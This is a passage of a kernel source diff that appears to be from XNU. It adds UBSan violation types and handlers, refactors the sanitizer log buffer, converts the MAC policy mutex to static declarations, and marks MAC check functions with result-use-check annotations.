+       struct san_src_loc loc;
+       struct san_type_desc *type_from;
+       struct san_type_desc *type_to;
+       unsigned char kind;
+};
+
+struct ubsan_func_type_mismatch_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type;
+};
+
+struct ubsan_vla_bound_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type;
+};
+
+struct ubsan_invalid_builtin {
+       struct san_src_loc loc;
+       unsigned char kind;
+};
+
 enum {
        UBSAN_OVERFLOW_add = 1,
        UBSAN_OVERFLOW_sub,
@@ -100,10 +142,17 @@ enum {
        UBSAN_ALIGN,
        UBSAN_POINTER_OVERFLOW,
        UBSAN_OOB,
-       UBSAN_GENERIC,
        UBSAN_TYPE_MISMATCH,
        UBSAN_LOAD_INVALID_VALUE,
-       UBSAN_VIOLATION_MAX,
+       UBSAN_NULLABILITY_ARG,
+       UBSAN_NULLABILITY_RETURN,
+       UBSAN_MISSING_RETURN,
+       UBSAN_FLOAT_CAST_OVERFLOW,
+       UBSAN_IMPLICIT_CONVERSION,
+       UBSAN_FUNCTION_TYPE_MISMATCH,
+       UBSAN_VLA_BOUND_NOT_POSITIVE,
+       UBSAN_INVALID_BUILTIN,
+       UBSAN_VIOLATION_MAX
 };
 
 struct ubsan_violation {
@@ -118,13 +167,27 @@ struct ubsan_violation {
                struct ubsan_ptroverflow_desc *ptroverflow;
                struct ubsan_oob_desc *oob;
                struct ubsan_load_invalid_desc *invalid;
+               struct ubsan_nullability_arg_desc *nonnull_arg;
+               struct ubsan_nullability_ret_desc *nonnull_ret;
+               struct ubsan_missing_ret_desc *missing_ret;
+               struct ubsan_float_desc *flt;
+               struct ubsan_implicit_conv_desc *implicit;
+               struct ubsan_func_type_mismatch_desc *func_mismatch;
+               struct ubsan_vla_bound_desc *vla_bound;
+               struct ubsan_invalid_builtin *invalid_builtin;
                const char *func;
        };
        struct san_src_loc *loc;
 };
 
+struct ubsan_buf {
+       size_t  ub_logged;
+       size_t  ub_buf_size;
+       char    *ub_buf;
+};
+
 void ubsan_log_append(struct ubsan_violation *);
-size_t ubsan_format(struct ubsan_violation *, char *buf, size_t sz);
+void ubsan_format(struct ubsan_violation *, struct ubsan_buf *);
 
 /*
  * UBSan ABI
@@ -135,10 +198,30 @@ void __ubsan_handle_add_overflow_abort(struct ubsan_overflow_desc *, uint64_t lh
 void __ubsan_handle_builtin_unreachable(struct ubsan_unreachable_desc *);
 void __ubsan_handle_divrem_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_divrem_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
+void __ubsan_handle_float_cast_overflow(struct ubsan_float_desc *, uint64_t);
+void __ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *, uint64_t);
+void __ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc*, uint64_t);
+void __ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *, uint64_t);
+void __ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t);
+void __ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t);
+void __ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *);
+void __ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *);
+void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t);
+void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t);
+void __ubsan_handle_missing_return(struct ubsan_missing_ret_desc *);
+void __ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *);
 void __ubsan_handle_mul_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_mul_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_negate_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_negate_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
+void __ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t);
 void __ubsan_handle_out_of_bounds(struct ubsan_oob_desc *, uint64_t idx);
 void __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *, uint64_t idx);
 void __ubsan_handle_pointer_overflow(struct ubsan_ptroverflow_desc *, uint64_t lhs, uint64_t rhs);
@@ -149,29 +232,7 @@ void __ubsan_handle_sub_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uin
 void __ubsan_handle_sub_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_type_mismatch_v1(struct ubsan_align_desc *, uint64_t val);
 void __ubsan_handle_type_mismatch_v1_abort(struct ubsan_align_desc *, uint64_t val);
-void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t);
-void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t);
-
-/* currently unimplemented */
-void __ubsan_handle_float_cast_overflow(struct san_src_loc *);
-void __ubsan_handle_float_cast_overflow_abort(struct san_src_loc *);
-void __ubsan_handle_function_type_mismatch(struct san_src_loc *);
-void __ubsan_handle_function_type_mismatch_abort(struct san_src_loc *);
-void __ubsan_handle_implicit_conversion(struct san_src_loc *);
-void __ubsan_handle_implicit_conversion_abort(struct san_src_loc *);
-void __ubsan_handle_invalid_builtin(struct san_src_loc *);
-void __ubsan_handle_invalid_builtin_abort(struct san_src_loc *);
-void __ubsan_handle_missing_return(struct san_src_loc *);
-void __ubsan_handle_missing_return_abort(struct san_src_loc *);
-void __ubsan_handle_nonnull_arg(struct san_src_loc *);
-void __ubsan_handle_nonnull_arg_abort(struct san_src_loc *);
-void __ubsan_handle_nonnull_return(struct san_src_loc *);
-void __ubsan_handle_nonnull_return_abort(struct san_src_loc *);
-void __ubsan_handle_nullability_arg(struct san_src_loc *);
-void __ubsan_handle_nullability_arg_abort(struct san_src_loc *);
-void __ubsan_handle_nullability_return(struct san_src_loc *);
-void __ubsan_handle_nullability_return_abort(struct san_src_loc *);
-void __ubsan_handle_vla_bound_not_positive(struct san_src_loc *);
-void __ubsan_handle_vla_bound_not_positive_abort(struct san_src_loc *);
+void __ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *, uint64_t);
+void __ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *, uint64_t);
 
 #endif /* _UBSAN_H_ */
index 0c77d4ce9be72f4e693fc03196f16d429a8482f8..aedd9f94e81afbc305ed51fffe990afe2c6e710a 100644 (file)
@@ -111,24 +111,26 @@ sysctl_ubsan_log_dump SYSCTL_HANDLER_ARGS
        os_atomic_thread_fence(seq_cst);
        tail = os_atomic_load(&ubsan_log_tail, relaxed);
 
-       char *buf;
-       size_t n = 0;
-       int err;
-
        if (tail == head) {
                return 0; /* log is empty */
        }
 
-       buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO);
+       char *buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO);
        if (!buf) {
                return 0;
        }
 
+       struct ubsan_buf ubsan_buf = {
+               .ub_logged = 0,
+               .ub_buf_size = sz,
+               .ub_buf = buf
+       };
+
        for (size_t i = tail; i != head; i = next_entry(i)) {
-               n += ubsan_format(&ubsan_log[i], buf + n, sz - n);
+               ubsan_format(&ubsan_log[i], &ubsan_buf);
        }
 
-       err = SYSCTL_OUT(req, buf, n);
+       int err = SYSCTL_OUT(req, buf, ubsan_buf.ub_logged);
 
        kheap_free(KHEAP_TEMP, buf, sz);
        return err;
index dd3da27a10e028ad653695861105108dfdd1cc72..7ac90d1647903b708f02d407e62f5d72cb24b9c9 100644 (file)
 #if CONFIG_MACF
 SYSCTL_NODE(, OID_AUTO, security, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Security Controls");
-SYSCTL_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "TrustedBSD MAC policy controls");
 
 /*
@@ -240,7 +240,8 @@ SYSCTL_UINT(_security_mac, OID_AUTO, vnode_enforce, SECURITY_MAC_CTLFLAGS,
  * For a few special operations involving a change to the list of
  * active policies, the mtx itself must be held.
  */
-static lck_mtx_t *mac_policy_mtx;
+static LCK_GRP_DECLARE(mac_lck_grp, "MAC lock");
+static LCK_MTX_DECLARE(mac_policy_mtx, &mac_lck_grp);
 
 /*
  * Policy list array allocation chunk size. Each entry holds a pointer.
@@ -269,11 +270,11 @@ struct mac_label_element_list_t mac_static_label_element_list;
 static __inline void
 mac_policy_grab_exclusive(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        while (mac_policy_busy != 0) {
-               lck_mtx_sleep(mac_policy_mtx, LCK_SLEEP_UNLOCK,
+               lck_mtx_sleep(&mac_policy_mtx, LCK_SLEEP_UNLOCK,
                    (event_t)&mac_policy_busy, THREAD_UNINT);
-               lck_mtx_lock(mac_policy_mtx);
+               lck_mtx_lock(&mac_policy_mtx);
        }
 }
 
@@ -282,16 +283,16 @@ mac_policy_release_exclusive(void)
 {
        KASSERT(mac_policy_busy == 0,
            ("mac_policy_release_exclusive(): not exclusive"));
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
        thread_wakeup((event_t) &mac_policy_busy);
 }
 
 void
 mac_policy_list_busy(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        mac_policy_busy++;
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
 }
 
 int
@@ -303,27 +304,27 @@ mac_policy_list_conditional_busy(void)
                return 0;
        }
 
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        if (mac_policy_list.numloaded > mac_policy_list.staticmax) {
                mac_policy_busy++;
                ret = 1;
        } else {
                ret = 0;
        }
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
        return ret;
 }
 
 void
 mac_policy_list_unbusy(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        mac_policy_busy--;
        KASSERT(mac_policy_busy >= 0, ("MAC_POLICY_LIST_LOCK"));
        if (mac_policy_busy == 0) {
                thread_wakeup(&mac_policy_busy);
        }
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
 }
 
 /*
@@ -332,10 +333,6 @@ mac_policy_list_unbusy(void)
 void
 mac_policy_init(void)
 {
-       lck_grp_attr_t *mac_lck_grp_attr;
-       lck_attr_t *mac_lck_attr;
-       lck_grp_t *mac_lck_grp;
-
        mac_policy_list.numloaded = 0;
        mac_policy_list.max = MAC_POLICY_LIST_CHUNKSIZE;
        mac_policy_list.maxindex = 0;
@@ -353,15 +350,6 @@ mac_policy_init(void)
 
        LIST_INIT(&mac_label_element_list);
        LIST_INIT(&mac_static_label_element_list);
-
-       mac_lck_grp_attr = lck_grp_attr_alloc_init();
-       mac_lck_grp = lck_grp_alloc_init("MAC lock", mac_lck_grp_attr);
-       mac_lck_attr = lck_attr_alloc_init();
-       lck_attr_setdefault(mac_lck_attr);
-       mac_policy_mtx = lck_mtx_alloc_init(mac_lck_grp, mac_lck_attr);
-       lck_attr_free(mac_lck_attr);
-       lck_grp_attr_free(mac_lck_grp_attr);
-       lck_grp_free(mac_lck_grp);
 }
 
 /* Function pointer set up for loading security extensions.
index 5a30437a013ada318fcc3bf6fc853b00ecc4ccb5..ed331a65d98ec57461a6e7cf8ad48b47d6917195 100644 (file)
@@ -121,6 +121,7 @@ struct vnode;
 struct vnode_attr;
 struct vop_setlabel_args;
 
+#include <stdbool.h>
 #include <sys/kauth.h>
 #include <sys/kernel_types.h>
 
@@ -142,16 +143,16 @@ typedef struct OSObject *io_object_t;
 
 /*@ === */
 int     mac_audit_check_postselect(kauth_cred_t cred, unsigned short syscode,
-    void *args, int error, int retval, int mac_forced);
+    void *args, int error, int retval, int mac_forced) __result_use_check;
 int     mac_audit_check_preselect(kauth_cred_t cred, unsigned short syscode,
-    void *args);
+    void *args) __result_use_check;
 int     mac_cred_check_label_update(kauth_cred_t cred,
-    struct label *newlabel);
+    struct label *newlabel) __result_use_check;
 int     mac_cred_check_label_update_execve(vfs_context_t ctx,
     struct vnode *vp, off_t offset, struct vnode *scriptvp,
     struct label *scriptvnodelabel, struct label *execlabel,
-    proc_t proc, void *macextensions);
-int     mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2);
+    proc_t proc, void *macextensions) __result_use_check;
+int     mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2) __result_use_check;
 struct label    *mac_cred_label_alloc(void);
 void    mac_cred_label_associate(kauth_cred_t cred_parent,
     kauth_cred_t cred_child);
@@ -159,10 +160,11 @@ void    mac_cred_label_associate_fork(kauth_cred_t cred, proc_t child);
 void    mac_cred_label_associate_kernel(kauth_cred_t cred);
 void    mac_cred_label_associate_user(kauth_cred_t cred);
 void    mac_cred_label_destroy(kauth_cred_t cred);
-int     mac_cred_label_externalize_audit(proc_t p, struct mac *mac);
+int     mac_cred_label_externalize_audit(proc_t p, struct mac *mac) __result_use_check;
 void    mac_cred_label_free(struct label *label);
 void    mac_cred_label_init(kauth_cred_t cred);
-int     mac_cred_label_compare(struct label *a, struct label *b);
+bool    mac_cred_label_is_equal(const struct label *a, const struct label *b) __result_use_check;
+uint32_t mac_cred_label_hash_update(const struct label *a, uint32_t hash);
 void    mac_cred_label_update(kauth_cred_t cred, struct label *newlabel);
 void    mac_cred_label_update_execve(vfs_context_t ctx, kauth_cred_t newcred,
     struct vnode *vp, off_t offset, struct vnode *scriptvp,
@@ -177,93 +179,94 @@ void    mac_devfs_label_destroy(struct devnode *de);
 void    mac_devfs_label_init(struct devnode *de);
 void    mac_devfs_label_update(struct mount *mp, struct devnode *de,
     struct vnode *vp);
-int     mac_execve_enter(user_addr_t mac_p, struct image_params *imgp);
-int     mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg);
-int     mac_file_check_create(kauth_cred_t cred);
-int     mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd);
+int     mac_execve_enter(user_addr_t mac_p, struct image_params *imgp) __result_use_check;
+int     mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
+int     mac_file_check_create(kauth_cred_t cred) __result_use_check;
+int     mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd) __result_use_check;
 int     mac_file_check_fcntl(kauth_cred_t cred, struct fileglob *fg, int cmd,
-    user_long_t arg);
+    user_long_t arg) __result_use_check;
 int     mac_file_check_get(kauth_cred_t cred, struct fileglob *fg,
-    char *elements, size_t len);
-int     mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg);
-int     mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg);
+    char *elements, size_t len) __result_use_check;
+int     mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
+int     mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
 int     mac_file_check_ioctl(kauth_cred_t cred, struct fileglob *fg,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_file_check_lock(kauth_cred_t cred, struct fileglob *fg, int op,
-    struct flock *fl);
+    struct flock *fl) __result_use_check;
 int     mac_file_check_library_validation(struct proc *proc,
     struct fileglob *fg, off_t slice_offset,
-    user_long_t error_message, size_t error_message_size);
+    user_long_t error_message, size_t error_message_size) __result_use_check;
 int     mac_file_check_mmap(kauth_cred_t cred, struct fileglob *fg,
-    int prot, int flags, uint64_t file_pos, int *maxprot);
+    int prot, int flags, uint64_t file_pos, int *maxprot) __result_use_check;
 void    mac_file_check_mmap_downgrade(kauth_cred_t cred, struct fileglob *fg,
     int *prot);
-int     mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg);
+int     mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
 int     mac_file_check_set(kauth_cred_t cred, struct fileglob *fg,
-    char *bufp, size_t buflen);
+    char *bufp, size_t buflen) __result_use_check;
 void    mac_file_notify_close(struct ucred *cred, struct fileglob *fg);
 void    mac_file_label_associate(kauth_cred_t cred, struct fileglob *fg);
 void    mac_file_label_destroy(struct fileglob *fg);
 void    mac_file_label_init(struct fileglob *fg);
-int     mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type);
-int     mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties);
-int     mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry);
-int     mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name);
+int     mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) __result_use_check;
+int     mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) __result_use_check;
+int     mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties) __result_use_check;
+int     mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry) __result_use_check;
+int     mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name) __result_use_check;
 #ifdef KERNEL_PRIVATE
-int     mac_iokit_check_hid_control(kauth_cred_t cred);
+int     mac_iokit_check_hid_control(kauth_cred_t cred) __result_use_check;
 #endif
 int     mac_mount_check_fsctl(vfs_context_t ctx, struct mount *mp,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_mount_check_getattr(vfs_context_t ctx, struct mount *mp,
-    struct vfs_attr *vfa);
-int     mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp);
+    struct vfs_attr *vfa) __result_use_check;
+int     mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_mount(vfs_context_t ctx, struct vnode *vp,
-    struct componentname *cnp, const char *vfc_name);
-int     mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp);
+    struct componentname *cnp, const char *vfc_name) __result_use_check;
+int     mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_snapshot_create(vfs_context_t ctx, struct mount *mp,
-    const char *name);
+    const char *name) __result_use_check;
 int     mac_mount_check_snapshot_delete(vfs_context_t ctx, struct mount *mp,
-    const char *name);
+    const char *name) __result_use_check;
 #ifdef KERNEL_PRIVATE
 int     mac_mount_check_snapshot_mount(vfs_context_t ctx, struct vnode *rvp,
     struct vnode *vp, struct componentname *cnp, const char *name,
-    const char *vfc_name);
+    const char *vfc_name) __result_use_check;
 #endif
 int     mac_mount_check_snapshot_revert(vfs_context_t ctx, struct mount *mp,
-    const char *name);
-int     mac_mount_check_remount(vfs_context_t ctx, struct mount *mp);
+    const char *name) __result_use_check;
+int     mac_mount_check_remount(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_setattr(vfs_context_t ctx, struct mount *mp,
-    struct vfs_attr *vfa);
-int     mac_mount_check_stat(vfs_context_t ctx, struct mount *mp);
-int     mac_mount_check_umount(vfs_context_t ctx, struct mount *mp);
+    struct vfs_attr *vfa) __result_use_check;
+int     mac_mount_check_stat(vfs_context_t ctx, struct mount *mp) __result_use_check;
+int     mac_mount_check_umount(vfs_context_t ctx, struct mount *mp) __result_use_check;
 void    mac_mount_label_associate(vfs_context_t ctx, struct mount *mp);
 void    mac_mount_label_destroy(struct mount *mp);
 int     mac_mount_label_externalize(struct label *label, char *elements,
-    char *outbuf, size_t outbuflen);
-int     mac_mount_label_get(struct mount *mp, user_addr_t mac_p);
+    char *outbuf, size_t outbuflen) __result_use_check;
+int     mac_mount_label_get(struct mount *mp, user_addr_t mac_p) __result_use_check;
 void    mac_mount_label_init(struct mount *);
-int     mac_mount_label_internalize(struct label *, char *string);
+int     mac_mount_label_internalize(struct label *, char *string) __result_use_check;
 int     mac_pipe_check_ioctl(kauth_cred_t cred, struct pipe *cpipe,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_pipe_check_kqfilter(kauth_cred_t cred, struct knote *kn,
-    struct pipe *cpipe);
-int     mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe);
+    struct pipe *cpipe) __result_use_check;
+int     mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
 int     mac_pipe_check_select(kauth_cred_t cred, struct pipe *cpipe,
-    int which);
-int     mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe);
-int     mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe);
+    int which) __result_use_check;
+int     mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
+int     mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
 struct label    *mac_pipe_label_alloc(void);
 void    mac_pipe_label_associate(kauth_cred_t cred, struct pipe *cpipe);
 void    mac_pipe_label_destroy(struct pipe *cpipe);
 void    mac_pipe_label_free(struct label *label);
 void    mac_pipe_label_init(struct pipe *cpipe);
 void    mac_policy_initbsd(void);
-int     mac_posixsem_check_create(kauth_cred_t cred, const char *name);
-int     mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem);
-int     mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem);
+int     mac_posixsem_check_create(kauth_cred_t cred, const char *name) __result_use_check;
+int     mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
+int     mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
 int     mac_posixsem_check_unlink(kauth_cred_t cred, struct pseminfo *psem,
-    const char *name);
-int     mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem);
+    const char *name) __result_use_check;
+int     mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
 void    mac_posixsem_vnode_label_associate(kauth_cred_t cred,
     struct pseminfo *psem, struct label *plabel,
     vnode_t vp, struct label *vlabel);
@@ -271,16 +274,16 @@ void    mac_posixsem_label_associate(kauth_cred_t cred,
     struct pseminfo *psem, const char *name);
 void    mac_posixsem_label_destroy(struct pseminfo *psem);
 void    mac_posixsem_label_init(struct pseminfo *psem);
-int     mac_posixshm_check_create(kauth_cred_t cred, const char *name);
+int     mac_posixshm_check_create(kauth_cred_t cred, const char *name) __result_use_check;
 int     mac_posixshm_check_mmap(kauth_cred_t cred, struct pshminfo *pshm,
-    int prot, int flags);
+    int prot, int flags) __result_use_check;
 int     mac_posixshm_check_open(kauth_cred_t cred, struct pshminfo *pshm,
-    int fflags);
-int     mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm);
+    int fflags) __result_use_check;
+int     mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm) __result_use_check;
 int     mac_posixshm_check_truncate(kauth_cred_t cred, struct pshminfo *pshm,
-    off_t s);
+    off_t s) __result_use_check;
 int     mac_posixshm_check_unlink(kauth_cred_t cred, struct pshminfo *pshm,
-    const char *name);
+    const char *name) __result_use_check;
 void    mac_posixshm_vnode_label_associate(kauth_cred_t cred,
     struct pshminfo *pshm, struct label *plabel,
     vnode_t vp, struct label *vlabel);
@@ -288,233 +291,234 @@ void    mac_posixshm_label_associate(kauth_cred_t cred,
     struct pshminfo *pshm, const char *name);
 void    mac_posixshm_label_destroy(struct pshminfo *pshm);
 void    mac_posixshm_label_init(struct pshminfo *pshm);
-int     mac_priv_check(kauth_cred_t cred, int priv);
-int     mac_priv_grant(kauth_cred_t cred, int priv);
-int     mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident);
-int     mac_proc_check_dump_core(proc_t proc);
-int     mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor);
-int     mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op);
-int     mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op);
-int     mac_proc_check_fork(proc_t proc);
-int     mac_proc_check_suspend_resume(proc_t proc, int sr);
-int     mac_proc_check_get_task_name(kauth_cred_t cred, proc_ident_t pident);
-int     mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident);
-int     mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident);
-int     mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp);
-int     mac_proc_check_getaudit(proc_t proc);
-int     mac_proc_check_getauid(proc_t proc);
+int     mac_priv_check(kauth_cred_t cred, int priv) __result_use_check;
+int     mac_priv_grant(kauth_cred_t cred, int priv) __result_use_check;
+int     mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident) __result_use_check;
+int     mac_proc_check_dump_core(proc_t proc) __result_use_check;
+int     mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor) __result_use_check;
+int     mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check;
+int     mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check;
+int     mac_proc_check_fork(proc_t proc) __result_use_check;
+int     mac_proc_check_suspend_resume(proc_t proc, int sr) __result_use_check;
+int     mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check;
+int     mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check;
+int     mac_proc_check_get_movable_control_port(void) __result_use_check;
+int     mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp) __result_use_check;
+int     mac_proc_check_getaudit(proc_t proc) __result_use_check;
+int     mac_proc_check_getauid(proc_t proc) __result_use_check;
 int     mac_proc_check_getlcid(proc_t proc1, proc_t proc2,
-    pid_t pid);
-int     mac_proc_check_ledger(proc_t curp, proc_t target, int op);
+    pid_t pid) __result_use_check;
+int     mac_proc_check_dyld_process_info_notify_register(void) __result_use_check;
+int     mac_proc_check_ledger(proc_t curp, proc_t target, int op) __result_use_check;
 int     mac_proc_check_map_anon(proc_t proc, user_addr_t u_addr,
-    user_size_t u_size, int prot, int flags, int *maxprot);
+    user_size_t u_size, int prot, int flags, int *maxprot) __result_use_check;
 int     mac_proc_check_mprotect(proc_t proc,
-    user_addr_t addr, user_size_t size, int prot);
-int     mac_proc_check_run_cs_invalid(proc_t proc);
+    user_addr_t addr, user_size_t size, int prot) __result_use_check;
+int     mac_proc_check_run_cs_invalid(proc_t proc) __result_use_check;
 void    mac_proc_notify_cs_invalidated(proc_t proc);
-int     mac_proc_check_sched(proc_t proc, proc_t proc2);
-int     mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai);
-int     mac_proc_check_setauid(proc_t proc, uid_t auid);
+int     mac_proc_check_sched(proc_t proc, proc_t proc2) __result_use_check;
+int     mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai) __result_use_check;
+int     mac_proc_check_setauid(proc_t proc, uid_t auid) __result_use_check;
 int     mac_proc_check_setlcid(proc_t proc1, proc_t proc2,
-    pid_t pid1, pid_t pid2);
+    pid_t pid1, pid_t pid2) __result_use_check;
 int     mac_proc_check_signal(proc_t proc1, proc_t proc2,
-    int signum);
-int     mac_proc_check_syscall_unix(proc_t proc, int scnum);
-int     mac_proc_check_wait(proc_t proc1, proc_t proc2);
+    int signum) __result_use_check;
+int     mac_proc_check_syscall_unix(proc_t proc, int scnum) __result_use_check;
+int     mac_proc_check_wait(proc_t proc1, proc_t proc2) __result_use_check;
 void    mac_proc_notify_exit(proc_t proc);
-int     mac_socket_check_accept(kauth_cred_t cred, struct socket *so);
-int     mac_socket_check_accepted(kauth_cred_t cred, struct socket *so);
+int     mac_socket_check_accept(kauth_cred_t cred, struct socket *so) __result_use_check;
+int     mac_socket_check_accepted(kauth_cred_t cred, struct socket *so) __result_use_check;
 int     mac_socket_check_bind(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_connect(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_create(kauth_cred_t cred, int domain,
-    int type, int protocol);
+    int type, int protocol) __result_use_check;
 int     mac_socket_check_ioctl(kauth_cred_t cred, struct socket *so,
-    unsigned long cmd);
-int     mac_socket_check_listen(kauth_cred_t cred, struct socket *so);
-int     mac_socket_check_receive(kauth_cred_t cred, struct socket *so);
+    unsigned long cmd) __result_use_check;
+int     mac_socket_check_listen(kauth_cred_t cred, struct socket *so) __result_use_check;
+int     mac_socket_check_receive(kauth_cred_t cred, struct socket *so) __result_use_check;
